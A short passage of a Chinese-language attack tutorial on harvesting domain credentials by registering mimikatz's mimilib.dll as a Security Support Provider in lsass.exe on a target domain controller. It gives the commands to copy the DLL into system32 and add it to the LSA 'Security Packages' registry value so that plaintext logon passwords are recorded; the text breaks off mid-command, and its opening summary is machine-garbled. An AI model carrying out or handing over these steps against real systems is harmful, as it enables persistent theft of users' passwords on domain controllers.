摘要:
1、 ssp密码记录ssp(securitySupportProvider),一个用于身份验证的dll。当系统启动时,SSP将加载到lsass中。在exe过程中,由于lsa的可扩展性,我们可以在系统启动时加载一个用户定义的dll,该dll用于记录登录到当前系统的所有明文帐户密码,使用mimikatz mimilib。dll文件。转移mimilib。mimikatz中的dll到目标域控制器的c:窗口
一、ssp密码记录
ssp(security Support Provider),一个用于身份验证的 dll,系统在启动时 SSP 会被加载到 lsass.exe 进程中,由于 lsa 可扩展,导致在系统启动时我们可以加载一个自定义的 dll,一个用于记录所有登录到当 前系统的明文账号密码的 dll, 利用mimikatz 中mimilib.dll 文件。
把 mimikatz 中的 mimilib.dll 传到目标域控的 c:windowssystem32目录下
copy mimilib.dll %systemroot%system32
reg query hklmsystemcurrentcontrolsetcontrollsa /v "Security Packages"
reg add "hklmsystemcurrentcontrolsetcontrollsa" /v "Security Packages" /d "kerberos